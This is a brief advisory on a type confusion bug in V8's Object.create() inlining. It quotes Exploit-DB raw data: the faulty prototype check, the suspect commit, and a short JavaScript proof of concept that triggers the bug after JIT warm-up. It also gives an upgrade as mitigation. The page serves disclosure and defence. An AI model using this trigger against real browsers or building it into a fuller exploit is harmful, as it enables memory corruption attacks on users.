Object.create Type Confusion Vulnerability

The Object.create() function in V8 JavaScript engine is vulnerable to type confusion. The vulnerability is caused by a check that fails to guarantee that the prototype given as the parameter is 'null'. This can lead to type confusion when Map::GetObjectCreateMap is called with the prototype, allowing an attacker to transition the prototype and cause type confusion.

Mitigation:

Upgrade to V8 version 8.4.371.19 or later.

Source

Exploit-DB raw data:

/*
I think this commit has introduced the bug.
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2

According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".

The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
  if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
    return NoChange();
  }
  instance_map = Map::GetObjectCreateMap(prototype_const);

PoC:
*/

var object;
function opt() {
    opt['x'] = 1.1;
    try {
        Object.create(object);
    } catch (e) {
    }

    for (let i = 0; i < 1000000; i++) {

    }
}

opt();
object = opt;
opt();